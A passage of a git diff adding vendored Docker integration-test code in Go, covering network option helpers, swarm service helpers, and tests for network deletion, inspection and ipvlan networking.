-0,0 +1,87 @@ +package network + +import ( + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/network" +) + +// WithDriver sets the driver of the network +func WithDriver(driver string) func(*types.NetworkCreate) { + return func(n *types.NetworkCreate) { + n.Driver = driver + } +} + +// WithIPv6 Enables IPv6 on the network +func WithIPv6() func(*types.NetworkCreate) { + return func(n *types.NetworkCreate) { + n.EnableIPv6 = true + } +} + +// WithCheckDuplicate enables CheckDuplicate on the create network request +func WithCheckDuplicate() func(*types.NetworkCreate) { + return func(n *types.NetworkCreate) { + n.CheckDuplicate = true + } +} + +// WithInternal sets the Internal flag on the network +func WithInternal() func(*types.NetworkCreate) { + return func(n *types.NetworkCreate) { + n.Internal = true + } +} + +// WithMacvlan sets the network as 
macvlan with the specified parent +func WithMacvlan(parent string) func(*types.NetworkCreate) { + return func(n *types.NetworkCreate) { + n.Driver = "macvlan" + if parent != "" { + n.Options = map[string]string{ + "parent": parent, + } + } + } +} + +// WithIPvlan sets the network as ipvlan with the specified parent and mode +func WithIPvlan(parent, mode string) func(*types.NetworkCreate) { + return func(n *types.NetworkCreate) { + n.Driver = "ipvlan" + if n.Options == nil { + n.Options = map[string]string{} + } + if parent != "" { + n.Options["parent"] = parent + } + if mode != "" { + n.Options["ipvlan_mode"] = mode + } + } +} + +// WithOption adds the specified key/value pair to network's options +func WithOption(key, value string) func(*types.NetworkCreate) { + return func(n *types.NetworkCreate) { + if n.Options == nil { + n.Options = map[string]string{} + } + n.Options[key] = value + } +} + +// WithIPAM adds an IPAM with the specified Subnet and Gateway to the network +func WithIPAM(subnet, gateway string) func(*types.NetworkCreate) { + return func(n *types.NetworkCreate) { + if n.IPAM == nil { + n.IPAM = &network.IPAM{} + } + + n.IPAM.Config = append(n.IPAM.Config, network.IPAMConfig{ + Subnet: subnet, + Gateway: gateway, + AuxAddress: map[string]string{}, + }) + } +} diff --git a/vendor/github.com/docker/docker/integration/internal/requirement/requirement.go b/vendor/github.com/docker/docker/integration/internal/requirement/requirement.go new file mode 100644 index 0000000000..004383bd05 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/internal/requirement/requirement.go @@ -0,0 +1,53 @@ +package requirement // import "github.com/docker/docker/integration/internal/requirement" + +import ( + "net/http" + "strings" + "testing" + "time" + + "github.com/docker/docker/pkg/parsers/kernel" + "gotest.tools/icmd" +) + +// HasHubConnectivity checks to see if https://hub.docker.com is +// accessible from the present environment +func HasHubConnectivity(t 
*testing.T) bool { + t.Helper() + // Set a timeout on the GET at 15s + var timeout = 15 * time.Second + var url = "https://hub.docker.com" + + client := http.Client{Timeout: timeout} + resp, err := client.Get(url) + if err != nil && strings.Contains(err.Error(), "use of closed network connection") { + t.Fatalf("Timeout for GET request on %s", url) + } + if resp != nil { + resp.Body.Close() + } + return err == nil +} + +func overlayFSSupported() bool { + result := icmd.RunCommand("/bin/sh", "-c", "cat /proc/filesystems") + if result.Error != nil { + return false + } + return strings.Contains(result.Combined(), "overlay\n") +} + +// Overlay2Supported returns true if the current system supports overlay2 as graphdriver +func Overlay2Supported(kernelVersion string) bool { + if !overlayFSSupported() { + return false + } + + daemonV, err := kernel.ParseRelease(kernelVersion) + if err != nil { + return false + } + requiredV := kernel.VersionInfo{Kernel: 4} + return kernel.CompareKernelVersion(*daemonV, requiredV) > -1 + +} diff --git a/vendor/github.com/docker/docker/integration/internal/swarm/service.go b/vendor/github.com/docker/docker/integration/internal/swarm/service.go new file mode 100644 index 0000000000..d8b16224fb --- /dev/null +++ b/vendor/github.com/docker/docker/integration/internal/swarm/service.go @@ -0,0 +1,200 @@ +package swarm + +import ( + "context" + "runtime" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + swarmtypes "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/internal/test/daemon" + "github.com/docker/docker/internal/test/environment" + "gotest.tools/assert" + "gotest.tools/poll" + "gotest.tools/skip" +) + +// ServicePoll tweaks the pollSettings for `service` +func ServicePoll(config *poll.Settings) { + // Override the default pollSettings for `service` resource here ... 
+ config.Timeout = 30 * time.Second + config.Delay = 100 * time.Millisecond + if runtime.GOARCH == "arm64" || runtime.GOARCH == "arm" { + config.Timeout = 90 * time.Second + } +} + +// NetworkPoll tweaks the pollSettings for `network` +func NetworkPoll(config *poll.Settings) { + // Override the default pollSettings for `network` resource here ... + config.Timeout = 30 * time.Second + config.Delay = 100 * time.Millisecond + + if runtime.GOARCH == "arm64" || runtime.GOARCH == "arm" { + config.Timeout = 50 * time.Second + } +} + +// ContainerPoll tweaks the pollSettings for `container` +func ContainerPoll(config *poll.Settings) { + // Override the default pollSettings for `container` resource here ... + + if runtime.GOARCH == "arm64" || runtime.GOARCH == "arm" { + config.Timeout = 30 * time.Second + config.Delay = 100 * time.Millisecond + } +} + +// NewSwarm creates a swarm daemon for testing +func NewSwarm(t *testing.T, testEnv *environment.Execution, ops ...func(*daemon.Daemon)) *daemon.Daemon { + t.Helper() + skip.If(t, testEnv.IsRemoteDaemon) + if testEnv.DaemonInfo.ExperimentalBuild { + ops = append(ops, daemon.WithExperimental) + } + d := daemon.New(t, ops...) + d.StartAndSwarmInit(t) + return d +} + +// ServiceSpecOpt is used with `CreateService` to pass in service spec modifiers +type ServiceSpecOpt func(*swarmtypes.ServiceSpec) + +// CreateService creates a service on the passed in swarm daemon. 
+func CreateService(t *testing.T, d *daemon.Daemon, opts ...ServiceSpecOpt) string { + t.Helper() + spec := defaultServiceSpec() + for _, o := range opts { + o(&spec) + } + + client := d.NewClientT(t) + defer client.Close() + + resp, err := client.ServiceCreate(context.Background(), spec, types.ServiceCreateOptions{}) + assert.NilError(t, err, "error creating service") + return resp.ID +} + +func defaultServiceSpec() swarmtypes.ServiceSpec { + var spec swarmtypes.ServiceSpec + ServiceWithImage("busybox:latest")(&spec) + ServiceWithCommand([]string{"/bin/top"})(&spec) + ServiceWithReplicas(1)(&spec) + return spec +} + +// ServiceWithInit sets whether the service should use init or not +func ServiceWithInit(b *bool) func(*swarmtypes.ServiceSpec) { + return func(spec *swarmtypes.ServiceSpec) { + ensureContainerSpec(spec) + spec.TaskTemplate.ContainerSpec.Init = b + } +} + +// ServiceWithImage sets the image to use for the service +func ServiceWithImage(image string) func(*swarmtypes.ServiceSpec) { + return func(spec *swarmtypes.ServiceSpec) { + ensureContainerSpec(spec) + spec.TaskTemplate.ContainerSpec.Image = image + } +} + +// ServiceWithCommand sets the command to use for the service +func ServiceWithCommand(cmd []string) ServiceSpecOpt { + return func(spec *swarmtypes.ServiceSpec) { + ensureContainerSpec(spec) + spec.TaskTemplate.ContainerSpec.Command = cmd + } +} + +// ServiceWithConfig adds the config reference to the service +func ServiceWithConfig(configRef *swarmtypes.ConfigReference) ServiceSpecOpt { + return func(spec *swarmtypes.ServiceSpec) { + ensureContainerSpec(spec) + spec.TaskTemplate.ContainerSpec.Configs = append(spec.TaskTemplate.ContainerSpec.Configs, configRef) + } +} + +// ServiceWithSecret adds the secret reference to the service +func ServiceWithSecret(secretRef *swarmtypes.SecretReference) ServiceSpecOpt { + return func(spec *swarmtypes.ServiceSpec) { + ensureContainerSpec(spec) + spec.TaskTemplate.ContainerSpec.Secrets = 
append(spec.TaskTemplate.ContainerSpec.Secrets, secretRef) + } +} + +// ServiceWithReplicas sets the replicas for the service +func ServiceWithReplicas(n uint64) ServiceSpecOpt { + return func(spec *swarmtypes.ServiceSpec) { + spec.Mode = swarmtypes.ServiceMode{ + Replicated: &swarmtypes.ReplicatedService{ + Replicas: &n, + }, + } + } +} + +// ServiceWithName sets the name of the service +func ServiceWithName(name string) ServiceSpecOpt { + return func(spec *swarmtypes.ServiceSpec) { + spec.Annotations.Name = name + } +} + +// ServiceWithNetwork sets the network of the service +func ServiceWithNetwork(network string) ServiceSpecOpt { + return func(spec *swarmtypes.ServiceSpec) { + spec.TaskTemplate.Networks = append(spec.TaskTemplate.Networks, + swarmtypes.NetworkAttachmentConfig{Target: network}) + } +} + +// ServiceWithEndpoint sets the Endpoint of the service +func ServiceWithEndpoint(endpoint *swarmtypes.EndpointSpec) ServiceSpecOpt { + return func(spec *swarmtypes.ServiceSpec) { + spec.EndpointSpec = endpoint + } +} + +// GetRunningTasks gets the list of running tasks for a service +func GetRunningTasks(t *testing.T, d *daemon.Daemon, serviceID string) []swarmtypes.Task { + t.Helper() + client := d.NewClientT(t) + defer client.Close() + + filterArgs := filters.NewArgs() + filterArgs.Add("desired-state", "running") + filterArgs.Add("service", serviceID) + + options := types.TaskListOptions{ + Filters: filterArgs, + } + tasks, err := client.TaskList(context.Background(), options) + assert.NilError(t, err) + return tasks +} + +// ExecTask runs the passed in exec config on the given task +func ExecTask(t *testing.T, d *daemon.Daemon, task swarmtypes.Task, config types.ExecConfig) types.HijackedResponse { + t.Helper() + client := d.NewClientT(t) + defer client.Close() + + ctx := context.Background() + resp, err := client.ContainerExecCreate(ctx, task.Status.ContainerStatus.ContainerID, config) + assert.NilError(t, err, "error creating exec") + + startCheck := 
types.ExecStartCheck{} + attach, err := client.ContainerExecAttach(ctx, resp.ID, startCheck) + assert.NilError(t, err, "error attaching to exec") + return attach +} + +func ensureContainerSpec(spec *swarmtypes.ServiceSpec) { + if spec.TaskTemplate.ContainerSpec == nil { + spec.TaskTemplate.ContainerSpec = &swarmtypes.ContainerSpec{} + } +} diff --git a/vendor/github.com/docker/docker/integration/network/delete_test.go b/vendor/github.com/docker/docker/integration/network/delete_test.go new file mode 100644 index 0000000000..c2684ae247 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/network/delete_test.go @@ -0,0 +1,73 @@ +package network // import "github.com/docker/docker/integration/network" + +import ( + "context" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/integration/internal/network" + "github.com/docker/docker/internal/test/request" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/skip" +) + +func containsNetwork(nws []types.NetworkResource, networkID string) bool { + for _, n := range nws { + if n.ID == networkID { + return true + } + } + return false +} + +// createAmbiguousNetworks creates three networks, of which the second network +// uses a prefix of the first network's ID as name. The third network uses the +// first network's ID as name. 
+// +// After successful creation, properties of all three networks are returned +func createAmbiguousNetworks(t *testing.T) (string, string, string) { + client := request.NewAPIClient(t) + ctx := context.Background() + + testNet := network.CreateNoError(t, ctx, client, "testNet") + idPrefixNet := network.CreateNoError(t, ctx, client, testNet[:12]) + fullIDNet := network.CreateNoError(t, ctx, client, testNet) + + nws, err := client.NetworkList(ctx, types.NetworkListOptions{}) + assert.NilError(t, err) + + assert.Check(t, is.Equal(true, containsNetwork(nws, testNet)), "failed to create network testNet") + assert.Check(t, is.Equal(true, containsNetwork(nws, idPrefixNet)), "failed to create network idPrefixNet") + assert.Check(t, is.Equal(true, containsNetwork(nws, fullIDNet)), "failed to create network fullIDNet") + return testNet, idPrefixNet, fullIDNet +} + +// TestDockerNetworkDeletePreferID tests that if a network with a name +// equal to another network's ID exists, the Network with the given +// ID is removed, and not the network with the given name. +func TestDockerNetworkDeletePreferID(t *testing.T) { + skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.34"), "broken in earlier versions") + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + testNet, idPrefixNet, fullIDNet := createAmbiguousNetworks(t) + + // Delete the network using a prefix of the first network's ID as name. + // This should remove the network named with the id-prefix, not the original network. + err := client.NetworkRemove(ctx, testNet[:12]) + assert.NilError(t, err) + + // Delete the network using networkID. 
This should remove the original + // network, not the network with the name equal to the networkID + err = client.NetworkRemove(ctx, testNet) + assert.NilError(t, err) + + // networks "testNet" and "idPrefixNet" should be removed, but "fullIDNet" should still exist + nws, err := client.NetworkList(ctx, types.NetworkListOptions{}) + assert.NilError(t, err) + assert.Check(t, is.Equal(false, containsNetwork(nws, testNet)), "Network testNet not removed") + assert.Check(t, is.Equal(false, containsNetwork(nws, idPrefixNet)), "Network idPrefixNet not removed") + assert.Check(t, is.Equal(true, containsNetwork(nws, fullIDNet)), "Network fullIDNet not found") +} diff --git a/vendor/github.com/docker/docker/integration/network/helpers.go b/vendor/github.com/docker/docker/integration/network/helpers.go new file mode 100644 index 0000000000..c0d70a168e --- /dev/null +++ b/vendor/github.com/docker/docker/integration/network/helpers.go @@ -0,0 +1,85 @@ +package network + +import ( + "context" + "fmt" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/client" + "github.com/docker/docker/pkg/parsers/kernel" + "gotest.tools/assert/cmp" + "gotest.tools/icmd" +) + +// CreateMasterDummy creates a dummy network interface +func CreateMasterDummy(t *testing.T, master string) { + // ip link add type dummy + icmd.RunCommand("ip", "link", "add", master, "type", "dummy").Assert(t, icmd.Success) + icmd.RunCommand("ip", "link", "set", master, "up").Assert(t, icmd.Success) +} + +// CreateVlanInterface creates a vlan network interface +func CreateVlanInterface(t *testing.T, master, slave, id string) { + // ip link add link name . 
type vlan id + icmd.RunCommand("ip", "link", "add", "link", master, "name", slave, "type", "vlan", "id", id).Assert(t, icmd.Success) + // ip link set up + icmd.RunCommand("ip", "link", "set", slave, "up").Assert(t, icmd.Success) +} + +// DeleteInterface deletes a network interface +func DeleteInterface(t *testing.T, ifName string) { + icmd.RunCommand("ip", "link", "delete", ifName).Assert(t, icmd.Success) + icmd.RunCommand("iptables", "-t", "nat", "--flush").Assert(t, icmd.Success) + icmd.RunCommand("iptables", "--flush").Assert(t, icmd.Success) +} + +// LinkExists verifies that a link exists +func LinkExists(t *testing.T, master string) { + // verify the specified link exists, ip link show + icmd.RunCommand("ip", "link", "show", master).Assert(t, icmd.Success) +} + +// IsNetworkAvailable provides a comparison to check if a docker network is available +func IsNetworkAvailable(c client.NetworkAPIClient, name string) cmp.Comparison { + return func() cmp.Result { + networks, err := c.NetworkList(context.Background(), types.NetworkListOptions{}) + if err != nil { + return cmp.ResultFromError(err) + } + for _, network := range networks { + if network.Name == name { + return cmp.ResultSuccess + } + } + return cmp.ResultFailure(fmt.Sprintf("could not find network %s", name)) + } +} + +// IsNetworkNotAvailable provides a comparison to check if a docker network is not available +func IsNetworkNotAvailable(c client.NetworkAPIClient, name string) cmp.Comparison { + return func() cmp.Result { + networks, err := c.NetworkList(context.Background(), types.NetworkListOptions{}) + if err != nil { + return cmp.ResultFromError(err) + } + for _, network := range networks { + if network.Name == name { + return cmp.ResultFailure(fmt.Sprintf("network %s is still present", name)) + } + } + return cmp.ResultSuccess + } +} + +// CheckKernelMajorVersionGreaterOrEqualThen returns whether the kernel version is greater than or equal to the one provided +func 
CheckKernelMajorVersionGreaterOrEqualThen(kernelVersion int, majorVersion int) bool { + kv, err := kernel.GetKernelVersion() + if err != nil { + return false + } + if kv.Kernel < kernelVersion || (kv.Kernel == kernelVersion && kv.Major < majorVersion) { + return false + } + return true +} diff --git a/vendor/github.com/docker/docker/integration/network/inspect_test.go b/vendor/github.com/docker/docker/integration/network/inspect_test.go new file mode 100644 index 0000000000..659ca29735 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/network/inspect_test.go @@ -0,0 +1,180 @@ +package network // import "github.com/docker/docker/integration/network" + +import ( + "context" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + swarmtypes "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/client" + "github.com/docker/docker/integration/internal/swarm" + "gotest.tools/assert" + "gotest.tools/poll" +) + +const defaultSwarmPort = 2477 + +func TestInspectNetwork(t *testing.T) { + defer setupTest(t)() + d := swarm.NewSwarm(t, testEnv) + defer d.Stop(t) + client := d.NewClientT(t) + defer client.Close() + + overlayName := "overlay1" + networkCreate := types.NetworkCreate{ + CheckDuplicate: true, + Driver: "overlay", + } + + netResp, err := client.NetworkCreate(context.Background(), overlayName, networkCreate) + assert.NilError(t, err) + overlayID := netResp.ID + + var instances uint64 = 4 + serviceName := "TestService" + t.Name() + + serviceID := swarm.CreateService(t, d, + swarm.ServiceWithReplicas(instances), + swarm.ServiceWithName(serviceName), + swarm.ServiceWithNetwork(overlayName), + ) + + poll.WaitOn(t, serviceRunningTasksCount(client, serviceID, instances), swarm.ServicePoll) + + _, _, err = client.ServiceInspectWithRaw(context.Background(), serviceID, types.ServiceInspectOptions{}) + assert.NilError(t, err) + + // Test inspect verbose with full NetworkID + networkVerbose, 
err := client.NetworkInspect(context.Background(), overlayID, types.NetworkInspectOptions{ + Verbose: true, + }) + assert.NilError(t, err) + assert.Assert(t, validNetworkVerbose(networkVerbose, serviceName, instances)) + + // Test inspect verbose with partial NetworkID + networkVerbose, err = client.NetworkInspect(context.Background(), overlayID[0:11], types.NetworkInspectOptions{ + Verbose: true, + }) + assert.NilError(t, err) + assert.Assert(t, validNetworkVerbose(networkVerbose, serviceName, instances)) + + // Test inspect verbose with Network name and swarm scope + networkVerbose, err = client.NetworkInspect(context.Background(), overlayName, types.NetworkInspectOptions{ + Verbose: true, + Scope: "swarm", + }) + assert.NilError(t, err) + assert.Assert(t, validNetworkVerbose(networkVerbose, serviceName, instances)) + + err = client.ServiceRemove(context.Background(), serviceID) + assert.NilError(t, err) + + poll.WaitOn(t, serviceIsRemoved(client, serviceID), swarm.ServicePoll) + poll.WaitOn(t, noTasks(client), swarm.ServicePoll) + + serviceID2 := swarm.CreateService(t, d, + swarm.ServiceWithReplicas(instances), + swarm.ServiceWithName(serviceName), + swarm.ServiceWithNetwork(overlayName), + ) + + poll.WaitOn(t, serviceRunningTasksCount(client, serviceID2, instances), swarm.ServicePoll) + + err = client.ServiceRemove(context.Background(), serviceID2) + assert.NilError(t, err) + + poll.WaitOn(t, serviceIsRemoved(client, serviceID2), swarm.ServicePoll) + poll.WaitOn(t, noTasks(client), swarm.ServicePoll) + + err = client.NetworkRemove(context.Background(), overlayID) + assert.NilError(t, err) + + poll.WaitOn(t, networkIsRemoved(client, overlayID), poll.WithTimeout(1*time.Minute), poll.WithDelay(10*time.Second)) +} + +func serviceRunningTasksCount(client client.ServiceAPIClient, serviceID string, instances uint64) func(log poll.LogT) poll.Result { + return func(log poll.LogT) poll.Result { + filter := filters.NewArgs() + filter.Add("service", serviceID) + tasks, err 
:= client.TaskList(context.Background(), types.TaskListOptions{ + Filters: filter, + }) + switch { + case err != nil: + return poll.Error(err) + case len(tasks) == int(instances): + for _, task := range tasks { + if task.Status.State != swarmtypes.TaskStateRunning { + return poll.Continue("waiting for tasks to enter run state") + } + } + return poll.Success() + default: + return poll.Continue("task count at %d waiting for %d", len(tasks), instances) + } + } +} + +func networkIsRemoved(client client.NetworkAPIClient, networkID string) func(log poll.LogT) poll.Result { + return func(log poll.LogT) poll.Result { + _, err := client.NetworkInspect(context.Background(), networkID, types.NetworkInspectOptions{}) + if err == nil { + return poll.Continue("waiting for network %s to be removed", networkID) + } + return poll.Success() + } +} + +func serviceIsRemoved(client client.ServiceAPIClient, serviceID string) func(log poll.LogT) poll.Result { + return func(log poll.LogT) poll.Result { + filter := filters.NewArgs() + filter.Add("service", serviceID) + _, err := client.TaskList(context.Background(), types.TaskListOptions{ + Filters: filter, + }) + if err == nil { + return poll.Continue("waiting for service %s to be deleted", serviceID) + } + return poll.Success() + } +} + +func noTasks(client client.ServiceAPIClient) func(log poll.LogT) poll.Result { + return func(log poll.LogT) poll.Result { + filter := filters.NewArgs() + tasks, err := client.TaskList(context.Background(), types.TaskListOptions{ + Filters: filter, + }) + switch { + case err != nil: + return poll.Error(err) + case len(tasks) == 0: + return poll.Success() + default: + return poll.Continue("task count at %d waiting for 0", len(tasks)) + } + } +} + +// Check to see if Service and Tasks info are part of the inspect verbose response +func validNetworkVerbose(network types.NetworkResource, service string, instances uint64) bool { + if service, ok := network.Services[service]; ok { + if len(service.Tasks) != 
int(instances) { + return false + } + } + + if network.IPAM.Config == nil { + return false + } + + for _, cfg := range network.IPAM.Config { + if cfg.Gateway == "" || cfg.Subnet == "" { + return false + } + } + return true +} diff --git a/vendor/github.com/docker/docker/integration/network/ipvlan/ipvlan_test.go b/vendor/github.com/docker/docker/integration/network/ipvlan/ipvlan_test.go new file mode 100644 index 0000000000..3da255e747 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/network/ipvlan/ipvlan_test.go @@ -0,0 +1,432 @@ +package ipvlan + +import ( + "context" + "strings" + "testing" + "time" + + dclient "github.com/docker/docker/client" + "github.com/docker/docker/integration/internal/container" + net "github.com/docker/docker/integration/internal/network" + n "github.com/docker/docker/integration/network" + "github.com/docker/docker/internal/test/daemon" + "gotest.tools/assert" + "gotest.tools/skip" +) + +func TestDockerNetworkIpvlanPersistance(t *testing.T) { + // verify the driver automatically provisions the 802.1q link (di-dummy0.70) + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + skip.If(t, testEnv.IsRemoteDaemon()) + skip.If(t, !ipvlanKernelSupport(), "Kernel doesn't support ipvlan") + + d := daemon.New(t, daemon.WithExperimental) + d.StartWithBusybox(t) + defer d.Stop(t) + + // master dummy interface 'di' notation represent 'docker ipvlan' + master := "di-dummy0" + n.CreateMasterDummy(t, master) + defer n.DeleteInterface(t, master) + + client, err := d.NewClient() + assert.NilError(t, err) + + // create a network specifying the desired sub-interface name + netName := "di-persist" + net.CreateNoError(t, context.Background(), client, netName, + net.WithIPvlan("di-dummy0.70", ""), + ) + + assert.Check(t, n.IsNetworkAvailable(client, netName)) + // Restart docker daemon to test the config has persisted to disk + d.Restart(t) + assert.Check(t, n.IsNetworkAvailable(client, netName)) +} + +func TestDockerNetworkIpvlan(t *testing.T) { 
+ skip.If(t, testEnv.DaemonInfo.OSType != "linux") + skip.If(t, testEnv.IsRemoteDaemon()) + skip.If(t, !ipvlanKernelSupport(), "Kernel doesn't support ipvlan") + + for _, tc := range []struct { + name string + test func(dclient.APIClient) func(*testing.T) + }{ + { + name: "Subinterface", + test: testIpvlanSubinterface, + }, { + name: "OverlapParent", + test: testIpvlanOverlapParent, + }, { + name: "L2NilParent", + test: testIpvlanL2NilParent, + }, { + name: "L2InternalMode", + test: testIpvlanL2InternalMode, + }, { + name: "L3NilParent", + test: testIpvlanL3NilParent, + }, { + name: "L3InternalMode", + test: testIpvlanL3InternalMode, + }, { + name: "L2MultiSubnet", + test: testIpvlanL2MultiSubnet, + }, { + name: "L3MultiSubnet", + test: testIpvlanL3MultiSubnet, + }, { + name: "Addressing", + test: testIpvlanAddressing, + }, + } { + d := daemon.New(t, daemon.WithExperimental) + d.StartWithBusybox(t) + + client, err := d.NewClient() + assert.NilError(t, err) + + t.Run(tc.name, tc.test(client)) + + d.Stop(t) + // FIXME(vdemeester) clean network + } +} + +func testIpvlanSubinterface(client dclient.APIClient) func(*testing.T) { + return func(t *testing.T) { + master := "di-dummy0" + n.CreateMasterDummy(t, master) + defer n.DeleteInterface(t, master) + + netName := "di-subinterface" + net.CreateNoError(t, context.Background(), client, netName, + net.WithIPvlan("di-dummy0.60", ""), + ) + assert.Check(t, n.IsNetworkAvailable(client, netName)) + + // delete the network while preserving the parent link + err := client.NetworkRemove(context.Background(), netName) + assert.NilError(t, err) + + assert.Check(t, n.IsNetworkNotAvailable(client, netName)) + // verify the network delete did not delete the predefined link + n.LinkExists(t, "di-dummy0") + } +} + +func testIpvlanOverlapParent(client dclient.APIClient) func(*testing.T) { + return func(t *testing.T) { + // verify the same parent interface cannot be used if already in use by an existing network + master := "di-dummy0" + 
parent := master + ".30" + n.CreateMasterDummy(t, master) + defer n.DeleteInterface(t, master) + n.CreateVlanInterface(t, master, parent, "30") + + netName := "di-subinterface" + net.CreateNoError(t, context.Background(), client, netName, + net.WithIPvlan(parent, ""), + ) + assert.Check(t, n.IsNetworkAvailable(client, netName)) + + _, err := net.Create(context.Background(), client, netName, + net.WithIPvlan(parent, ""), + ) + // verify that the overlap returns an error + assert.Check(t, err != nil) + } +} + +func testIpvlanL2NilParent(client dclient.APIClient) func(*testing.T) { + return func(t *testing.T) { + // ipvlan l2 mode - dummy parent interface is provisioned dynamically + netName := "di-nil-parent" + net.CreateNoError(t, context.Background(), client, netName, + net.WithIPvlan("", ""), + ) + assert.Check(t, n.IsNetworkAvailable(client, netName)) + + ctx := context.Background() + id1 := container.Run(t, ctx, client, container.WithNetworkMode(netName)) + id2 := container.Run(t, ctx, client, container.WithNetworkMode(netName)) + + _, err := container.Exec(ctx, client, id2, []string{"ping", "-c", "1", id1}) + assert.NilError(t, err) + } +} + +func testIpvlanL2InternalMode(client dclient.APIClient) func(*testing.T) { + return func(t *testing.T) { + netName := "di-internal" + net.CreateNoError(t, context.Background(), client, netName, + net.WithIPvlan("", ""), + net.WithInternal(), + ) + assert.Check(t, n.IsNetworkAvailable(client, netName)) + + ctx := context.Background() + id1 := container.Run(t, ctx, client, container.WithNetworkMode(netName)) + id2 := container.Run(t, ctx, client, container.WithNetworkMode(netName)) + + timeoutCtx, cancel := context.WithTimeout(context.Background(), 1*time.Second) + defer cancel() + _, err := container.Exec(timeoutCtx, client, id1, []string{"ping", "-c", "1", "-w", "1", "8.8.8.8"}) + // FIXME(vdemeester) check the time of error ? 
+ assert.Check(t, err != nil) + assert.Check(t, timeoutCtx.Err() == context.DeadlineExceeded) + + _, err = container.Exec(ctx, client, id2, []string{"ping", "-c", "1", id1}) + assert.NilError(t, err) + } +} + +func testIpvlanL3NilParent(client dclient.APIClient) func(*testing.T) { + return func(t *testing.T) { + netName := "di-nil-parent-l3" + net.CreateNoError(t, context.Background(), client, netName, + net.WithIPvlan("", "l3"), + net.WithIPAM("172.28.230.0/24", ""), + net.WithIPAM("172.28.220.0/24", ""), + ) + assert.Check(t, n.IsNetworkAvailable(client, netName)) + + ctx := context.Background() + id1 := container.Run(t, ctx, client, + container.WithNetworkMode(netName), + container.WithIPv4(netName, "172.28.220.10"), + ) + id2 := container.Run(t, ctx, client, + container.WithNetworkMode(netName), + container.WithIPv4(netName, "172.28.230.10"), + ) + + _, err := container.Exec(ctx, client, id2, []string{"ping", "-c", "1", id1}) + assert.NilError(t, err) + } +} + +func testIpvlanL3InternalMode(client dclient.APIClient) func(*testing.T) { + return func(t *testing.T) { + netName := "di-internal-l3" + net.CreateNoError(t, context.Background(), client, netName, + net.WithIPvlan("", "l3"), + net.WithInternal(), + net.WithIPAM("172.28.230.0/24", ""), + net.WithIPAM("172.28.220.0/24", ""), + ) + assert.Check(t, n.IsNetworkAvailable(client, netName)) + + ctx := context.Background() + id1 := container.Run(t, ctx, client, + container.WithNetworkMode(netName), + container.WithIPv4(netName, "172.28.220.10"), + ) + id2 := container.Run(t, ctx, client, + container.WithNetworkMode(netName), + container.WithIPv4(netName, "172.28.230.10"), + ) + + timeoutCtx, cancel := context.WithTimeout(context.Background(), 1*time.Second) + defer cancel() + _, err := container.Exec(timeoutCtx, client, id1, []string{"ping", "-c", "1", "-w", "1", "8.8.8.8"}) + // FIXME(vdemeester) check the time of error ? 
+ assert.Check(t, err != nil) + assert.Check(t, timeoutCtx.Err() == context.DeadlineExceeded) + + _, err = container.Exec(ctx, client, id2, []string{"ping", "-c", "1", id1}) + assert.NilError(t, err) + } +} + +func testIpvlanL2MultiSubnet(client dclient.APIClient) func(*testing.T) { + return func(t *testing.T) { + netName := "dualstackl2" + net.CreateNoError(t, context.Background(), client, netName, + net.WithIPvlan("", ""), + net.WithIPv6(), + net.WithIPAM("172.28.200.0/24", ""), + net.WithIPAM("172.28.202.0/24", "172.28.202.254"), + net.WithIPAM("2001:db8:abc8::/64", ""), + net.WithIPAM("2001:db8:abc6::/64", "2001:db8:abc6::254"), + ) + assert.Check(t, n.IsNetworkAvailable(client, netName)) + + // start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.100.0/24 and 2001:db8:abc2::/64 + ctx := context.Background() + id1 := container.Run(t, ctx, client, + container.WithNetworkMode(netName), + container.WithIPv4(netName, "172.28.200.20"), + container.WithIPv6(netName, "2001:db8:abc8::20"), + ) + id2 := container.Run(t, ctx, client, + container.WithNetworkMode(netName), + container.WithIPv4(netName, "172.28.200.21"), + container.WithIPv6(netName, "2001:db8:abc8::21"), + ) + c1, err := client.ContainerInspect(ctx, id1) + assert.NilError(t, err) + + // verify ipv4 connectivity to the explicit --ipv address second to first + _, err = container.Exec(ctx, client, id2, []string{"ping", "-c", "1", c1.NetworkSettings.Networks[netName].IPAddress}) + assert.NilError(t, err) + // verify ipv6 connectivity to the explicit --ipv6 address second to first + _, err = container.Exec(ctx, client, id2, []string{"ping6", "-c", "1", c1.NetworkSettings.Networks[netName].GlobalIPv6Address}) + assert.NilError(t, err) + + // start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.102.0/24 and 2001:db8:abc4::/64 + id3 := container.Run(t, ctx, client, + container.WithNetworkMode(netName), + 
container.WithIPv4(netName, "172.28.202.20"), + container.WithIPv6(netName, "2001:db8:abc6::20"), + ) + id4 := container.Run(t, ctx, client, + container.WithNetworkMode(netName), + container.WithIPv4(netName, "172.28.202.21"), + container.WithIPv6(netName, "2001:db8:abc6::21"), + ) + c3, err := client.ContainerInspect(ctx, id3) + assert.NilError(t, err) + + // verify ipv4 connectivity to the explicit --ipv address from third to fourth + _, err = container.Exec(ctx, client, id4, []string{"ping", "-c", "1", c3.NetworkSettings.Networks[netName].IPAddress}) + assert.NilError(t, err) + // verify ipv6 connectivity to the explicit --ipv6 address from third to fourth + _, err = container.Exec(ctx, client, id4, []string{"ping6", "-c", "1", c3.NetworkSettings.Networks[netName].GlobalIPv6Address}) + assert.NilError(t, err) + + // Inspect the v4 gateway to ensure the proper default GW was assigned + assert.Equal(t, c1.NetworkSettings.Networks[netName].Gateway, "172.28.200.1") + // Inspect the v6 gateway to ensure the proper default GW was assigned + assert.Equal(t, c1.NetworkSettings.Networks[netName].IPv6Gateway, "2001:db8:abc8::1") + // Inspect the v4 gateway to ensure the proper explicitly 